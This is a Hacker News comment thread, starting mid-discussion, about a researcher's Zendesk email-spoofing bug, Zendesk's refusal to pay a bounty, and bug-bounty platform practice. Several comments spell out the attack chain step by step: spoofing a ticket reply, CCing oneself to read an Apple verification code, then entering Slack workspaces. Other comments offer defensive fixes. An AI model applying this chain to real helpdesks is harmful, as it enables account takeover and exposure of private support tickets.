But being a static page didn't stop the people running scanners from asking us for money, even after they were informed of the above.
The solution? Delete it altogether to return 404.
The logic being that any actual security-researcher with even minimal levels of competency will know to check the security.txt file and can follow basic instructions; while if any of our actual (paying) users find a security issue then they’ll go through our internal ticket site and not public e-mail anyway - so all that’s left are low-effort vuln-scanner reports - and it’s always the same non-issues like clickjacking (but only when using IE9 for some reason, even though it’s 2024 now…) or people who think their browser’s Web Inspector is a “hacking tool” that allows anyone to edit any data in our system…
And FWIW, I’ve never received a genuine security issue report through it in the 18 months we’ve had a security.txt file - it’s almost as if qualified, competent professionals don’t operate like an embarrassingly pathetic shakedown.
They also had a security.txt file and had received several emails through that, but all of it was spam. Ironically they had received more real security vulnerabilities through people contacting them on LinkedIn than through their security.txt file.
Your mileage may vary, but it didn’t seem like the security.txt file was read by the people one would hope would read it.
But after the PoC that showed the severity in a way that anyone could understand, they still didn't pay. That's the issue. The whole investigation was done for them.
- chat stuff you can embed into your site for user support
- managed call center software
- knowledgebase management linking all the other services
- whitelabel consumer forums you can use for offloading some of the support
- a shitton of analytics
- sales CRM
- profile platform you can link to various sources of information to get info on their activity on your site, so that you can use that for support
And there is probably a few more. Sales CRM alone can be its own company.
As usual on hackernews there is a lot more to it, but you are just not exposed to it.
To ease concerns about our scalability and longevity, we moved from a tiny office to an office with a lot of empty space.
This strategic move supposedly signaled to prospective corporate clients that we were committed to sustaining our solution over the long term, rather than just a few years. In the end the company went out of business anyway. So much for that.
I wish I was kidding. Used to work at a place that did crap like that, pulling in developers for these time sucks because "only they really know the correct technical usage for our industry."
Smells like being afraid to make a choice, even a tiny one.
Building at scale without racking up a big bill, while still hitting SLAs, requires a decent amount of effort.
And the common management approach to anything not working immediately is "throw another 1,000 employees at the project", and the middle-managers measure their success by how many employees they are managing, so it's a train without brakes. Hope it goes bankrupt soon.
If you can't get one story through in a week, you start a bunch of them so one finishes every few days.
What’s more insane is that it is still better than the vast majority of ticketing software. I don’t know what it is about ticketing and helpdesk software that it ALWAYS ends up like that.
The curse of B2B software is that every new big customer wants some custom feature or configuration that is the "deal breaker" for their multi-million dollar contract signing. And everyone except engineering is eager to give it to them because it's not their problem once the ink is dry. Support and renewals are the next guy's problem.
Like any SaaS, the more feature boxes you check, the more potential customers you can "satisfy". And the worse the UX gets for the average user (which then gets driven to purchasing more support).
Great for business (the few), terrible for users (the many). No contradiction there.
Now, I understand there's probably a lot more to it which is why I would expect it to be a company of around 50 engineers and 150 business/marketing/etc and that's being generous.
The hill I'd die on is that, with money not being a scarce resource and a technically feasible challenge present, a team of 200 should be able to build and sustain almost anything in the world. And that's being even generous. I think realistically a team of 50 should be able to build almost anything
You have to admit it's a very social job, talking with lots and lots and lots of people
Later
I wrote this comment before rereading the original post and realizing that they had literally submitted a DKIM report (albeit a rare instance of a meaningful one). Just to be clear: in my original comment, I did not mean to suggest this bug was silly; only that in the world of security bug bounties, DKIM reports are universally viewed as silly.
The only thing that matters is the severity and what it allows attackers to do.
>In addition to this, we also implemented filters to automatically suspend the following classes of emails:
>- User verification emails sent by Apple, based on the Reply-To and Message-Id header values
>- Non-transactional emails from [email protected]
>Over the coming months, we will continue to look into opportunities to strengthen our Sender Authentication functionality and provide customers with more granular and advanced security controls over the types of emails that get suspended or rejected.
So is it still possible to hijack anyone's support tickets using the default configuration of Zendesk if you just happen to know their email and ticket ID?
Zendesk is very well aware of SPF/DMARC, from their support pages.
https://gist.github.com/hackermondev/68ec8ed145fcee49d2f5e2b...
[1] https://gist.github.com/hackermondev/68ec8ed145fcee49d2f5e2b...
Yes, the researcher could have tee'd himself up better, but this says way more about Zendesk than it does about the 15-year-old researcher.
It's possible that some chains could have credentials or other sensitive information in ticket chains.
Clearly Zendesk needs to change things so that the email address that is created for a ticket isn’t guessable.
Of course, this is only a good strategy if you're just wanting to do a good deed and not counting on getting more than a thank you note, but Zendesk or Hackerone (whoever you want to blame here) didn't even accept the bug in the first place. That's the problem here, not the omission of an exploit chain
We add impact demonstrations to a few findings per pentest report because our audience is broader: the nontechnical people who decide to allocate the money need to understand why this is useful and that the devs/sysadmins need to get enough time to do things right (developers and sysadmins are often sufficiently skilled, but are under delivery pressure). A sufficiently technical team, when the bug is adequately explained, doesn't need a functional exploit to see whether it's real and impactful.
The reason people don't do this is because they think they have something that can be modified into another bug. Which is exactly what happened here.
White hat hackers do not require companies to pay them in exchange for not revealing a bug---the reveal of a bug only happens if a company doesn't fix that bug. Companies can be jerks and refuse to pay anything. That doesn't give you the right to blackmail them---you and other security researchers can just refuse to help them in the future.
A refusal to fix the vulnerability is what happened in the original blogpost, so it was fair game for release since the company doesn't care.
Hackers that don't care about ethics or legality won't bother blackmailing companies with vulnerabilities. They'll sell or use the vulnerability to steal more important data, and blackmail companies for millions of dollars in crypto.
I also disagree that there's anything ethically dubious about it.
After they decided not to work on it, they later came back and asked him for more information and treat it like a bug...
Author should have gotten a reward. He did everything right, even if Zendesk claims it's not an in-scope bug.
The incident almost certainly cost Zendesk more in (according to the gist) lost contracts and reputational damage than it would've cost to pay the security researcher a bounty.
For a sensible large company, it’s not worth being stingy over (relative) pennies. They waste money like it’s water. They might as well spend where it matters. Bug bounties won’t even show on their bottom line, but cleanup for an exploited issue will.
They created a fake band called "Zendesk Alternative" just in an attempt to pollute the Google results if you search for an alternative to Zendesk.
http://zendeskalternative.com/
While not illegal, it shows the way they think, a sort of manipulative pettiness.
But also, SECURITY culture concerns beat culture culture. Companies should def consider ditching them for this lapse and their poor form in making it right.
If Zendesk is smart, they should hop on this thread and pay this kid out while everyone is still paying attention in one place, rather than later, when everyone is quietly making business decisions in a thousand little alcoves of the internet.
Otherwise, this is the best thing to happen to the Zendesk Alternatives in a long time
I'm actually pretty annoyed at the stupidity, it's the kind of thing that even a shitty search engine won't be fooled by and hey when I search for Zendesk alternatives I don't see any brand called Zendesk alternative in first few results.
I mean it's like they're too stupid to do what every other weaselly scumbag does, get some fake reviews up comparing your brand to alternatives with the reviews carefully weighted so your target customer base will be uh, I guess Zendesk is really what we want then.
Or at least buy an ad words for the search - with the words Zendesk - There is No Alternative showing up before all the alternatives.
It's ok Zendesk if you use my clever slogan because you can't think of one on your own - I'm not expecting you to pay me for it.
Searching `Zendesk alternative` (no s, no quotes):
- Google shows it in the top 5 results.
- Bing shows it on the second page.
- Brave shows it in the middle of the first page.
- DDG doesn't show it.
- Yahoo shows it on page 3
- Yandex doesn't show it
So no harm, no foul, right?
Calling yourself 'charmed' by an insecurity-driven marketing shtick that denies rational competition is certainly one reaction.
"The book burning was abhorrent, in principle. But the lights were so calm and the fire was so warm... I was actually kinda charmed!"
Also, anytime I search for "X alternative" the results are all AI-generated garbage anyway, so I'd welcome something quirky and original like this in my results.
Yes, that’s it. They paid their marketing team to do this to be funny.
It's the same reason why Google paid its marketing team to make a promo for Gmail Blue (back in 2013 when Google was still doing legitimately funny fake promos):
https://www.gmail.com/mail/help/intl/en/promos/blue/
That's evil!
I wouldn't read too much into this, because one unmaintained old website is not going to make or break the SEO game of others.
Takes me back to a more innocent time of the Internet.
Search engine chaff has been in the toolbag of "reputation management" PR firms for a while. Boris Johnson (former UK PM) deployed it many years ago to drown out a viral picture of him in front of a red bus bearing an ad he no longer wanted to be associated with, so he was coached to tell an interviewer he has a hobby of painting model buses red.
And in 2027, Zendesk finds that the strategy worked. A little too well! Now the top search result for Zendesk is the rock band, and if you ask an AI about Zendesk, the AI starts yappin about a rock band too! Hahaha
That is hilarious, but also the most non punk rock thing I've ever read. If Apple did it, everyone here would be fawning over what a genius move it was.
I love the self report :^)
Edit: Why don’t they seem to value their credibility?
Ironically, the domain was given to DDG from Google.
To Daniel/hackermondev: whatever you're doing, keep it up!
This architecture makes 0 sense to me. Even if an org has totally outsourced its identity and auth management to Google (is this possible?), presumably that would include controls over how new @targetorg.com identities are created on the Google end.
No F500 companies are using Apple as an identity provider, since Apple definitely doesn't sell such services. So why would an F500 company configure Slack to allow Apple OAuth & introduce this vulnerability?
Tangentially, this does raise one of my big issues with using OAuth2 for single-sign-on though, which is that it really doesn't address the third-party authorization problem well. Ok, you're [email protected], Google has verified that, and example.com is our domain, so we're letting you into our app Foobar. Now what? The scopes you requested were for Google APIs only and have nothing to do with Foobar really. So now we need to implement an authorization system in Foobar that decides what [email protected] can actually do. This part, and how to do it right, gets glossed over (at best!) by discussions on OAuth2. It also gets glossed over by product and security when they want things "SSO-enabled", which means development time doesn't get budgeted for it. Even just using groups to control coarse access levels requires integration with provider-specific APIs. OAuth2 is great for identity and authentication, but far too little attention has been paid to doing authorization right.
Further, IMO, sure it's a bug that one can say they control [email protected]. But IMO the real issue is lousy, permissive authorisation that gives access to anything simply by virtue of controlling a @company.com mail. Surely some HR/tech person, when an employee is being onboarded, should be enabling access to some core systems (probably by adding them to a group), and the default state for an account with no groups should be no access.
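The "no groups means no access" default the parent describes can be sketched roughly like this (group names and permission strings are hypothetical):

```python
# Default-deny authorization after SSO: a verified identity alone grants
# nothing; access comes only from explicit group membership.
GROUP_PERMISSIONS = {
    "support-staff": {"tickets:read", "tickets:write"},
    "admins": {"tickets:read", "tickets:write", "settings:write"},
}

def permissions_for(user_groups: list[str]) -> set[str]:
    perms: set[str] = set()
    for group in user_groups:
        perms |= GROUP_PERMISSIONS.get(group, set())
    return perms  # empty set for a user in no groups -> no access

def can(user_groups: list[str], action: str) -> bool:
    return action in permissions_for(user_groups)
```

Under this model, merely proving control of a @company.com address (via SIWA or anything else) lands you in zero groups, so authentication alone buys you nothing.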
In any large enough organisation, IME there's a lot of ways to get a @org.com email, and too many people/systems have the ability to create an email than a single centralised IT team.
But even so, there's another mechanism, which is that when you create an OAuth2-enabled project in Google's console, you can specify that only known users in your domain are allowed to authenticate through it. This would lock out any personal account anyway.
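On the relying-party side, the complementary check is the hosted-domain claim in the verified Google ID token: Workspace (managed) accounts carry an `hd` claim, while consumer Gmail accounts do not. A minimal sketch, assuming the token signature has already been verified (e.g. with the google-auth library):

```python
# claims: the decoded payload of an already-verified Google ID token.
def is_managed_account(claims: dict, allowed_domain: str) -> bool:
    # Consumer accounts (including "[email protected]"-style
    # personal accounts created on a corporate address) have no "hd"
    # claim, so they are rejected even though the email domain matches.
    return claims.get("hd") == allowed_domain
```

This is exactly the distinction the thread is about: checking the email domain accepts Bob's leftover personal account, checking `hd` only accepts accounts the company actually manages.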
1. Zendesk allows you to add a CC to any existing support ticket by sending a (spoofed) reply from the original requestor's email address to that ticket's Reply-To address and including a CC in the email.
In some circumstances the Reply-To address is based on an auto-incrementing integer, so it can be guessed. (Although this may not always be the case: my email archives show some emails from Zendesk using the integer and other emails using a random alphanumeric string. It seems to vary by company, so it might be some sort of configuration setting?)
2. Slack allows third-party domain-wide logins via Sign in with Apple without additional verification that the email belongs to a real person. Here the author of the article pretends to be [email protected] to Slack and Slack lets them into the company.com channel, despite the fact that [email protected] does not actually represent a real user and is only intended to be a receiving email address that forwards into Zendesk. (This sounds more like a configuration problem than anything else though.)
Sign In with Apple is allowing you to "create an account" (author's words) on @company.com, which should not be supported in the first place. Instead, it should rely on a central directory controlled by company.com for authentication.
Zendesk deserves a lot of flak here, especially after they had already realized this was real. However, just to empathize a bit: the amount of spam SPF, DKIM, and DMARC "security" reports anyone running a service gets is absolutely insane. So it's very easy to accidentally misclassify what this reporter originally discovered as that.
Zendesk gave me a tshirt but not any money for it. C'est la vie.
Huh? I don't think you can read page contents unless the origin matches exactly (scheme://host:port).
So for this to work still, you need to bypass a spam filter.
They should just enforce DMARC and SPF like Google has done, and say "your fault if you misconfigure". Default-off for the CC thing would be a good idea too, with a warning about what could happen if they turn it on. Alternatively, use a non-guessable id for the email.
EDIT: they absolutely should not use an auto-incrementing int as a "support-chain token" though; that's a fix they could easily make.
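Enforcing DMARC on inbound support mail could look roughly like this sketch, which trusts the `Authentication-Results` header stamped by your own inbound gateway (a naive parse; a real system must also strip forged copies of this header that the sender injected):

```python
import email
import re

def dmarc_passed(raw: bytes) -> bool:
    """Return True only if our gateway recorded a DMARC pass verdict.
    No verdict at all is treated as untrusted, not as a pass."""
    msg = email.message_from_bytes(raw)
    for header in msg.get_all("Authentication-Results") or []:
        match = re.search(r"dmarc=(\w+)", header)
        if match:
            return match.group(1).lower() == "pass"
    return False
```

Anything failing this check would at minimum be barred from privileged actions like adding a CC to an existing ticket, which is the step the exploit relied on.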
I checked my email archives and some (but not all) of the emails I've received from Zendesk have arbitrary alphanumeric ids in the Reply-To header instead of integers. Seems to depend on the company, perhaps this is a configuration issue?
1. Apple sends a legitimate email with a verification code from [email protected] to [email protected], creating a ticket in Zendesk.
2. The attacker then sends an email to [email protected] from [email protected] (spoofed), attaching their own email address in the CC field.
3. Since the attacker is now CC'ed they can read the entire history of the ticket including the legitimate email Apple sent in (1) containing the verification code.
4. Now that the attacker has verified ownership of the Apple ID with the email address [email protected] they can use that Apple ID to login to any service that grants domain-based access via Sign in With Apple, such as Slack.
Though his pondering of 'why do companies use third party support systems instead of rolling their own' gave his age away :)
What was the planned response for addressing the vulnerability reported through the Bug Bounty program, and how did the plan change after the researcher escalated the issue directly to Zendesk before remediation was completed?
According to the researcher, they only contacted 3rd parties after Zendesk rejected the disclosure as out of scope, as they are free to do.
If this timeline is incorrect, Zendesk should immediately correct the record. As it stands, accusing the researcher of violating ethical principles looks very bad for Zendesk. Perhaps even libelous.
That it affected Slack was a side-effect of the original bug, and not a new, previously undisclosed bug. Zendesk fixed the original bug, after rejecting the disclosure. Given all that, Zendesk is still ethically bound to honor the bounty, 3rd party disclosures notwithstanding.
Are you yourself not at fault for forcing him to violate the terms in order to protect your customers?
2. "they violated key ethical principles by directly contacting third parties about their report prior to remediation", what is a violation of ethical principles is to know about a security failure in your application and ignore it, leaving customers at risk, can't wait for some law to pass so people who behave like that face consequences.
3. "We have no evidence that this vulnerability was exploited by a bad actor.", tldr, it don't fixed it until some vendor dropped us, because before that happened, it was cheaper to ignore it.
This is blatant dishonesty- the post documented in detail that the reward had already been denied, and the issue ignored multiple times before they contacted 3rd parties. That is not an ethical violation but an ethical necessity- after ZenDesk refused to act, they had an ethical responsibility to inform everyone affected.
This alone is a huge red flag that ZenDesk isn't a trustworthy organization, on top of trying to hide rather than correct security issues unless they get bad press.
If I were ZenDesk, I would pay out the bounty to this kid immediately, and release a detailed public apology explaining how the entire bounty review system has been revamped to take things like this much more seriously in the future.
The original is:
”1 bug, $50,000+ in bounties, how Zendesk intentionally left a backdoor in hundreds of Fortune 500 companies”
A better edit might be something like:
“The $50k bug where Zendesk backdoored Fortune 500 companies”
50k corresponds to the money they made with unrelated bug bounties.
I wish they would fix the title so that it properly calls out zendesk refused to pay for a serious bug.
1 bug, 50k:
I don't know why the "1" got dropped.
If you submit "Why I care" it'll decide that you meant 'I care".
If you submit "10 More Secrets in Pokemon" it'll decide you meamt "More Secrets in Pokemon".
Conversely, there's an entire cottage industry focused on writing attention-catching headlines, which results in patterns like what HN mangles.
If it's annoying, OP can edit immediately after submitting to overwrite the mangled title with the correct one.
"SPF, DKIM, and DMARC issues" is absolutely and positively intended to mean "we don't care if we are missing these headers on our domains", in part because this is 99.9% of drive-by beg bounties (if you are tired of getting "I HAVE FOUND A SERIOUS SECURITY ISSUE IN YOUR WEBSITE" cc'ing security@, legal@, privacy@, and your CEO on a monthly cadence, just set up a DKIM record :P)
Yes, this is technically a bug which is in the space of SPF, DKIM, and/or DMARC. But this is absolutely NOT WHAT THE EXCLUSION IS FOR. Hacker One triage teams should know better, and it's frankly embarrassing that they don't. And it's frankly mortifying that their mediation team also didn't pick up on this.
But it checks out.
This is one of the reasons I will not use Hacker One ever. Bugcrowd is slightly better. Intigriti has (so far) been pretty good. I'm not affiliated with any of them, just have been a customer of all three.
I finally stopped when two large companies have stopped communicating with me over the last year (all bugs have been triaged on the H1 side).
They owe me a total of around 30k. H1 can't do anything about it. It seems there is no actual contract in place to protect researchers.
I generally refuse to go through platforms now (also because I really hate being subject to the psychological pressure of a "social credit system", even though I understand why the platforms do it), so if your company doesn't have an alternative reporting form, or refuses bug bounty payouts when a valid issue was reported directly through them instead of through a platform (hello, Backblaze!), I'm not doing free labor for you and you will likely hear about the bug when either someone else finds it or I include it in a public write-up (if it's a bug affecting multiple companies).
You're better off not bothering contacting them.
1. zendesk allows you to add users to a support issue and view the complete issue history by sending a response email to a guessable support email from a person associated with an issue and cc'ing the person to add.
2. Zendesk depends on a spam check for inbound email validity. This check does not appear to catch instances where the sender email is spoofed. Zendesk claims this is due to DKIM/SPF/DMARC config, but I have trouble imagining that 50% of the Fortune 500 would get this wrong. There are many automated checks available.
3. Apple issues an Apple ID account to anyone who can receive a verification email sent to the email address ([email protected]).
4. Slack allows you to sign in to a workspace using any Apple ID associated with the workspace domain (e.g. [email protected]).
This researcher reported #2 to hackerone and was declined. Researcher later discovered full exploit with 3 and 4. Did not update hackerone, contacted affected companies directly.
It would have been prudent to update HackerOne on the additional finding, but it feels like an easy oversight for a 15-year-old after getting rejected on the first round.
Zendesk should take the higher ground and recognize the mistake and correct it. Not get all "ethical mumbo jumbo."
I'm not 15, but since you ignore(d) me - game over.
Do you find it surprising that they use Microsoft Office too? Paying someone else to handle things like this is cheaper than paying developers and hosting a service like this.
And also that being brilliant doesn’t magically correlate with being knowledgeable.
https://xkcd.com/1053
For some reason this line cracked me up. Sounds exactly like something 15-year-old me might say :-).
Let’s build our own ticketing system! How hard could it be?
H1 should restrict ZD from their platform.
It is challenging for Zendesk to enforce or fix DKIM, SPF, and DMARC issues across all client domains, so better to just ignore it :grimace:
The irony is that they have the worst support and one of the worst response times to issues reported. You will find many experiences on LinkedIn reporting this.
For a company built on email, they're not good at it.
I thought this was mainly mitigated by invalidating the assumption that “only authorized employees can control a company email” – it used to be common 5-10 years ago to verify “that you’re an employee” that way, but I just assumed that kind of stopped in favor of whatever SSO/SAML stuff that became popular with enterprise.
Is this the same thing? Or a variation?
If you value your time and your health, don't use these platforms. If platforms want security, they can hire people by the hour/day and pay them the relevant wages.
So the hacks put in place to deal with Google SSO hadn’t been put in place for Apple’s.
Also, what Fortune 500 company is leaving slack’s email based login feature enabled? Why wouldn’t they all be using a corporate SSO solution tied to their company’s slack directory?
Also I think this is a good reminder that using sequential IDs for anything public facing is almost always a bad idea (or at the very least something you should think very hard about). It would be pretty easy to make ticket ID, for example, a sequential 5 digit number followed by 4 random alphanumeric characters. Everyone could still easily refer to the ticket number, but it wouldn't be guessable.
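A sketch of the hybrid scheme the parent describes (format is hypothetical): a human-friendly sequential part plus a short random suffix, so tickets can still be quoted over the phone but can't be enumerated by counting upward:

```python
import secrets
import string

ALPHABET = string.ascii_uppercase + string.digits

def make_ticket_id(seq: int) -> str:
    # 4 random chars from a 36-symbol alphabet ~ 1.7M suffixes per
    # sequence number: guessing the sequence alone is no longer enough.
    suffix = "".join(secrets.choice(ALPHABET) for _ in range(4))
    return f"{seq:05d}-{suffix}"

tid = make_ticket_id(123)
```

Note the suffix must actually be checked on every lookup; if the backend matches on the numeric part alone, the suffix is decoration, not security.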
Nothing changes for them even if they ignore one report, especially from an unknown researcher.
It exposes a pretty sad state of the industry. Who said enterprise?
I.e. you have the domain support.example.com, CNAMEd to Zendesk, so you cannot add any other DNS record to it; Zendesk should publish it on their side. But they refuse, and force you to put a CAA record on your root domain example.com.
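For illustration, the resulting zone ends up looking something like this (names and CA are examples only); because the CNAME name can carry no other records, the CAA has to sit at the apex, where it then applies to every subdomain without its own CAA:

```
; support.example.com is a CNAME, so it cannot hold its own CAA record.
example.com.          CAA    0 issue "letsencrypt.org"
support.example.com.  CNAME  example.zendesk.com.
```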
https://medium.com/intigriti/how-i-hacked-hundreds-of-compan...
Wait - how is that workflow possible and supported?
In my head, authorization under @company.com would be delegated to a central directory, instead of relying on Apple ID. It is effectively an authentication bypass.
I would add that HackerOne could also take action and push for a positive outcome, instead of being just a middleman.
Why do they even have a bounty program if they do this?
I like this kid
No responsibilities and all the time in the world to learn with the right circumstances, they can go far.
Older devs who are experts in this area are already busy making money and working on their employer's security.
Ah, yes, why do laymen always think this?
I mean, I get it, Krupp and mining towns used to be a thing, so it is possible.
But every big company should build a ticketing system? Why not an email solution, OS, network routers too?
I mean it sounds weird to argue that you won't pay, but do not allow the person to talk about it anyway. Even more so if the person communicated with affected companies instead of some darknet marketplace.
Come on, honor your bug bounty. Especially when it can bite you in the ass hard enough to plummet stock prices if a bug of this caliber is exploited in the companies you serve
That this hurts Zendesk is too bad, it's still the morally correct thing to do and Zendesk probably understands that, too